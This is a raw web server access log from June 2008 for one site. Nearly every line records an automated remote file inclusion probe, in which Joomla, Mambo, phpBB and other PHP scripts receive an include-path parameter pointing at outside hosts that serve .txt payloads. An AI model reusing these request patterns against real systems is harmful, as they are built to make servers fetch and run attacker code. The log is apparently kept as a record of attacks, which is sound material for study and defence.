211.189.26.170 - - [09/Jun/2008:11:40:51 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.27.164 - - [09/Jun/2008:11:40:54 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.164 - - [09/Jun/2008:11:40:57 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:41:03 -0700] "GET /logs/access_080106.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [09/Jun/2008:11:41:17 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [09/Jun/2008:11:41:18 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:41:26 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:11:41:31 -0700] "GET /index.php?canal=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 200 16871 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:41:31 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:41:31 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:11:41:32 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:41:39 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:41:40 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [09/Jun/2008:11:41:42 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [09/Jun/2008:11:41:43 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:41:52 -0700] "GET /logs/access_080330.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:41:52 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:41:52 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.251.172 - - [09/Jun/2008:11:41:54 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [09/Jun/2008:11:41:59 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:41:59 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:41:59 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.87.191.61 - - [09/Jun/2008:11:42:31 -0700] "GET /logs/access.log/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [09/Jun/2008:11:42:31 -0700] "GET /errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [09/Jun/2008:11:42:32 -0700] "GET /logs/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:11:42:51 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [09/Jun/2008:11:42:52 -0700] "GET /logs/access_080106.log/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:42:59 -0700] "GET /logs/access_080109.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:42:59 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:42:59 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
160.99.12.231 - - [09/Jun/2008:11:43:32 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [09/Jun/2008:11:43:33 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.164.77 - - [09/Jun/2008:11:43:52 -0700] "GET /logs/access_080330.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.164.77 - - [09/Jun/2008:11:43:52 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.164.77 - - [09/Jun/2008:11:43:52 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.2.228.10 - - [09/Jun/2008:11:44:06 -0700] "GET /logs//errors.php?error=http://powderpuffsquad.com/admin/backups/.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.2.228.10 - - [09/Jun/2008:11:44:07 -0700] "GET //errors.php?error=http://powderpuffsquad.com/admin/backups/.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:44:09 -0700] "GET /logs/access_080330.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:44:09 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:44:11 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:44:27 -0700] "GET /logs/access_080208.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:44:27 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:44:27 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:44:28 -0700] "GET /logs/access_080221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:44:37 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:44:37 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:44:37 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [09/Jun/2008:11:44:50 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:44:56 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:44:58 -0700] "GET /logs/access_080208.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:44:58 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:44:59 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:45:00 -0700] "GET /logs/access_080221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:11:45:00 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:11:45:00 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.196.178 - - [09/Jun/2008:11:45:27 -0700] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
74.53.196.178 - - [09/Jun/2008:11:45:27 -0700] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
67.205.67.205 - - [09/Jun/2008:11:45:30 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:11:45:40 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:11:45:41 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:11:45:41 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.216.2.12 - - [09/Jun/2008:11:45:49 -0700] "GET /logs/access_080429.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.tripiwarez.eu/script/blid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.129.23 - - [09/Jun/2008:11:45:58 -0700] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
64.15.129.23 - - [09/Jun/2008:11:46:00 -0700] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:46:27 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:46:27 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:46:27 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.67.205 - - [09/Jun/2008:11:46:28 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [09/Jun/2008:11:46:29 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [09/Jun/2008:11:46:29 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:11:46:30 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:11:46:30 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:11:46:31 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:11:46:31 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.7.193.199 - - [09/Jun/2008:11:46:35 -0700] "GET /logs/access_080103.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://it.geocities.com/djr0x32/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.193.199 - - [09/Jun/2008:11:46:36 -0700] "GET /logs/access_080109.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://it.geocities.com/djr0x32/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.42.191 - - [09/Jun/2008:11:46:38 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [09/Jun/2008:11:46:38 -0700] "GET /modules/My_eGallery/index.php?basepath=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [09/Jun/2008:11:46:38 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:46:43 -0700] "GET /logs/access_080208.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:46:43 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:46:44 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:46:47 -0700] "GET /logs/access_080221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.87.84 - - [09/Jun/2008:11:46:49 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.87.84 - - [09/Jun/2008:11:46:49 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:47:22 -0700] "GET /logs/access_071230.log//bemarket/postscript/postscript.php?p_mode=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:47:22 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:47:22 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.164.77 - - [09/Jun/2008:11:47:28 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.19.184.14 - - [09/Jun/2008:11:47:38 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [09/Jun/2008:11:47:39 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [09/Jun/2008:11:47:39 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:47:49 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:47:50 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.2.228.10 - - [09/Jun/2008:11:47:54 -0700] "GET /logs//errors.php?error=http://powderpuffsquad.com/admin/backups/.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.2.228.10 - - [09/Jun/2008:11:47:54 -0700] "GET //errors.php?error=http://powderpuffsquad.com/admin/backups/.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:47:55 -0700] "GET /logs/access_080208.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:47:56 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:47:56 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:11:48:02 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:48:02 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:48:03 -0700] "GET /logs/access_080221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.24.217 - - [09/Jun/2008:11:48:10 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/setanzzz/xpl/cmdhancur.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.234.24.217 - - [09/Jun/2008:11:48:11 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/setanzzz/xpl/cmdhancur.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.234.24.217 - - [09/Jun/2008:11:48:11 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/setanzzz/xpl/cmdhancur.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.234.24.217 - - [09/Jun/2008:11:48:19 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/setanzzz/xpl/cmdhancur.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.234.24.217 - - [09/Jun/2008:11:48:19 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/setanzzz/xpl/cmdhancur.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.234.24.217 - - [09/Jun/2008:11:48:20 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/setanzzz/xpl/cmdhancur.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.234.24.217 - - [09/Jun/2008:11:48:20 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/setanzzz/xpl/cmdhancur.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.234.24.217 - - [09/Jun/2008:11:48:20 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/setanzzz/xpl/cmdhancur.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.234.24.217 - - [09/Jun/2008:11:48:21 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/setanzzz/xpl/cmdhancur.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:11:48:27 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 27